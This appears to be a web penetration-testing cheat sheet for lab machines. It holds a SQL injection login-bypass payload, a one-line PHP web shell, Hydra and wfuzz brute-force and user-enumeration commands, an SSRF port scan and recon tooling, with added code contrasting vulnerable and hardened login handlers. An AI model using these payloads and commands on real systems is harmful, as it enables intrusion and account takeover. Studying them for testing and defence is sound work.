Simple SQL injection to try on a login form: username admin, password ' OR '1'='1. It works when the login query is built by string concatenation as ... WHERE user='<user>' AND pass='<pass>', because AND binds tighter than OR and the WHERE clause becomes always true.
admin:' OR '1'='1
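Worked example of why that payload logs you in, added here and not part of the original notes: a constructed in-memory SQLite users table (the accounts and passwords are made up), the string-concatenated query that the payload breaks, and the parameterised query that does not. The `admin'-- ` variant is shown too, since `--` comments out the password check entirely.

```python
import sqlite3

def build_db():
    # Constructed sample table; not real credentials.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("admin", "S3cretAdminPw!"), ("alice", "hunter2")])
    return db

def vulnerable_login(db, username, password):
    """Login check built by string concatenation: the injectable pattern."""
    query = ("SELECT username FROM users WHERE username = '%s' "
             "AND password = '%s'" % (username, password))
    # With ' OR '1'='1 the clause is (username=... AND password='') OR '1'='1',
    # true for every row, so the first row in the table comes back (often admin).
    row = db.execute(query).fetchone()
    return row[0] if row else None

def safe_login(db, username, password):
    """Same check with bound parameters: input is data, never parsed as SQL."""
    row = db.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None

PAYLOAD = "' OR '1'='1"
COMMENT_PAYLOAD = "admin'-- "   # closes the string, comments out the rest

if __name__ == "__main__":
    db = build_db()
    print(vulnerable_login(db, "admin", PAYLOAD))          # admin
    print(vulnerable_login(db, COMMENT_PAYLOAD, "wrong"))  # admin
    print(safe_login(db, "admin", PAYLOAD))                # None
```

The bypass needs the quote characters to reach the SQL parser unescaped; if the form strips or escapes quotes, or the query is parameterised as in `safe_login`, the same input is just a wrong password.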
Using Nmap NSE scripts to scan for known HTTP vulnerabilities (the flag is --script; quote the glob so the shell does not expand it)
sudo nmap --script "http-vul*" -p 80 <IP Address>
# -Pn skip host discovery, -sV version detection, -sC default scripts, -vvvvv maximum verbosity
nmap -Pn -sV -sC -vvvvv -p 80 192.168.1.1
Curl: grab the service banner and response headers (-i includes the headers in the output; add -k for self-signed HTTPS)
curl -i http://[IP]
Read robots.txt: a good place to find directories the site owner does not want indexed by Google (each Disallow entry is a candidate path to check by hand or feed to dirb/gobuster)
curl http://example.com/robots.txt
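Small helper, added here and not from the original notes, that turns a robots.txt body into wordlist entries for dirb/gobuster: it keeps Disallow/Allow paths, drops comments, Sitemap lines and wildcard tails, and strips the slashes so each entry works as a wordlist word. The robots.txt content below is constructed for the example; pass a URL on the command line to fetch a real one.

```python
# Constructed robots.txt body standing in for the fetched file.
SAMPLE_ROBOTS = """\
# robots for example.com
User-agent: *
Disallow: /admin/
Disallow: /backup/db.sql.bak
Disallow: /cgi-bin/
Disallow: /private/*.php
Allow: /public/
Sitemap: https://example.com/sitemap.xml

User-agent: Googlebot
Disallow: /old-site/
"""

def robots_paths(body):
    """Return unique Disallow/Allow paths in order of appearance.
    Comments, blank lines, other fields, a bare '/' and wildcard tails are dropped."""
    seen, out = set(), []
    for raw in body.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or ":" not in line:
            continue
        field, value = (s.strip() for s in line.split(":", 1))
        if field.lower() not in ("disallow", "allow") or not value or value == "/":
            continue
        path = value.split("*", 1)[0]   # keep the literal prefix before any wildcard
        if path.startswith("/") and path not in seen:
            seen.add(path)
            out.append(path)
    return out

def wordlist_entries(paths):
    """Strip leading/trailing slashes so the paths can be used as wordlist words."""
    return [p.strip("/") for p in paths if p.strip("/")]

if __name__ == "__main__":
    import sys, urllib.request
    if len(sys.argv) > 1:
        body = urllib.request.urlopen(sys.argv[1], timeout=10).read().decode("utf-8", "replace")
    else:
        body = SAMPLE_ROBOTS
    for entry in wordlist_entries(robots_paths(body)):
        print(entry)
```

Run as `python3 robots_words.py http://target/robots.txt > robots-words.txt` and pass the file to `gobuster dir -w robots-words.txt -u http://target`; a 403 on one of these paths is still worth noting, since the entry proves the directory exists.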
Using dirb to scan a website for directories and files
dirb http://<IP Address>:PORT
# -X appends each extension to every word (dirb wants the leading dot on each one)
dirb http://<IP address> -X .php,.html,.txt
# -r disables recursion into directories it finds
dirb http://<ip address> -r
# gobuster: -k skips TLS certificate verification (self-signed certs on lab targets), -x adds extensions, -t sets threads, -o writes results to a file
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/common.txt -u https://10.10.10.7 -k -x txt,php,html -t 40
gobuster dir -u http://jail.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.txt
gobuster dir -u http://shocker.htb/cgi-bin/ -w /usr/share/wordlists/dirb/common.txt -x cgi,sh,pl,py
gobuster dir -u http://10.10.10.73 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x aspx -t 30
WhatWeb: fingerprint the web stack (server, CMS, frameworks, plugins)
whatweb [IP]:[PORT] --color=never --log-brief="[OUTPUT].txt"
Nikto: web server vulnerability scanner
nikto -host http://10.0.0.1
SSL Scan
sslscan $RHOST
# dirsearch: another directory brute-forcer (-e extensions to append, -x status codes to exclude, -t threads)
python3 /opt/dirsearch/dirsearch.py -u http://10.10.10.9/ -e php -x 403,404 -t 50
Check WebDAV (tests whether PUT/MOVE can upload executable files)
davtest -url http://10.10.10.14
# Using Hydra to brute force the password of the admin user via an HTTPS POST form (^USER^ and ^PASS^ are substituted from -l/-P; the text after the last colon is the failure marker Hydra looks for in the response)
hydra 10.10.10.43 -l admin -P /usr/share/seclists/Passwords/twitter-banned.txt https-post-form "/department/login.php:username=^USER^&password=^PASS^&proc_login=true:Incorrect password"
# wfuzz example of finding valid users: --hs hides every response containing the "unknown user" string, so what remains are usernames that exist
wfuzz -c -w /usr/share/seclists/Usernames/Names/names.txt --hs "No account found with that username." -d "username=FUZZ&password=password" http://10.10.10.97/login.php
# wfuzz example of finding a known user's password: hide the "wrong password" response, whatever remains is the hit
wfuzz -c -w /usr/share/wordlists/rockyou.txt --hs "The password you entered was not valid." -d "username=tyler&password=FUZZ" http://10.10.10.97/login.php
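What the two wfuzz runs above rely on, as an added example that is not part of the original notes: a login handler that returns a different failure message for an unknown user than for a wrong password is an oracle, and `--hs` is just "keep the responses that lack this string". The code emulates both runs against a constructed user store and short constructed wordlists, and puts the hardened handler next to it so you can see that with one generic message the enumeration step yields nothing.

```python
# Constructed credential store standing in for the target's user database.
USERS = {"tyler": "hunter2", "admin": "S3cretAdminPw!"}

def leaky_login(username, password):
    """Returns (status, body). Different failure text for 'no such user' and
    'wrong password' is the oracle that wfuzz --hs filters on."""
    if username not in USERS:
        return 200, "No account found with that username."
    if USERS[username] != password:
        return 200, "The password you entered was not valid."
    return 302, "Welcome, " + username

def uniform_login(username, password):
    """Hardened handler: one generic message for every failure, so the body
    no longer reveals whether the username exists."""
    if USERS.get(username) != password:
        return 200, "Invalid username or password."
    return 302, "Welcome, " + username

def fuzz(handler, attempts, hide_string):
    """Emulate 'wfuzz -w list --hs <string>': send every (username, password)
    pair and keep the ones whose response body does NOT contain hide_string."""
    return [(u, p) for (u, p) in attempts if hide_string not in handler(u, p)[1]]

NAMES = ["aaron", "tyler", "bob", "admin"]               # constructed slice of names.txt
PASSWORDS = ["123456", "password", "hunter2", "qwerty"]  # constructed slice of rockyou.txt

if __name__ == "__main__":
    # User enumeration: hide the "unknown user" response; what remains exists.
    print(fuzz(leaky_login, [(n, "password") for n in NAMES],
               "No account found with that username."))
    # Password guessing for a known user: hide the "wrong password" response.
    print(fuzz(leaky_login, [("tyler", p) for p in PASSWORDS],
               "The password you entered was not valid."))
    # Against the uniform handler the enumeration step returns nothing.
    print(fuzz(uniform_login, [(n, "password") for n in NAMES],
               "Invalid username or password."))
```

The generic message only closes the username oracle; a successful guess still produces a different response, so the password step works against either handler until rate limiting or lockout stops it, and a handler that only hashes the password for existing accounts still leaks the same information through response time.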
# Simple PHP web shell: the command comes from the ipp parameter (e.g. ?ipp=id); system() already prints the output, so no echo is needed
<?php system($_REQUEST["ipp"]); ?>
# wfuzz is a good free alternative to Burp Intruder. Here it port-scans localhost through an SSRF in url.php (quote the URL so the shell leaves the ? alone)
wfuzz -c -z range,1-65535 "http://10.10.10.55:60000/url.php?path=http://localhost:FUZZ"
# Only show ports that respond: --hl=2 hides responses with 2 lines, which is what closed ports returned here (check the baseline against a known-closed port first)
wfuzz -c -z range,1-65535 --hl=2 "http://10.10.10.55:60000/url.php?path=http://localhost:FUZZ"
CeWL - CeWL creates custom wordlists based on a specific URL by crawling the web page and picking out relevant words. This can be used to assist in brute-forcing web page logins.
Example Syntax (-m is the minimum word length, -w the output file):
If http:
cewl -m 6 -w cewl.txt http://[IP]:[PORT]/
If https:
cewl -m 6 -w cewl.txt https://[IP]:[PORT]/
wafw00f - wafw00f identifies whether a particular web address is behind a web application firewall.
Example Syntax:
If http:
wafw00f http://[IP]:[PORT]
If https:
wafw00f https://[IP]:[PORT]
Gobuster - Gobuster is a directory/file busting tool for websites written in Go. This tool can be run multiple ways, but two main busting strategies are almost always used:
Utilize a wordlist of common files/directories.
Utilize a wordlist of common CGI scripts.
Common Directory Busting Example Syntax (gobuster 3.x syntax: -s whitelists status codes and needs the default 404 blacklist cleared with -b ""; current SecLists releases name the directory Web-Content):
If http:
gobuster dir -w /usr/share/wordlists/SecLists/Discovery/Web_Content/common.txt -u http://[IP]:[PORT] -s "200,204,301,307,403,500" -b ""
If https:
gobuster dir -w /usr/share/wordlists/SecLists/Discovery/Web_Content/common.txt -u https://[IP]:[PORT] -s "200,204,301,307,403,500" -b "" -k
Common CGI Busting Example Syntax:
If http:
gobuster dir -w /usr/share/wordlists/SecLists/Discovery/Web_Content/cgis.txt -u http://[IP]:[PORT] -s "200,204,301,307,403,500" -b ""
If https:
gobuster dir -w /usr/share/wordlists/SecLists/Discovery/Web_Content/cgis.txt -u https://[IP]:[PORT] -s "200,204,301,307,403,500" -b "" -k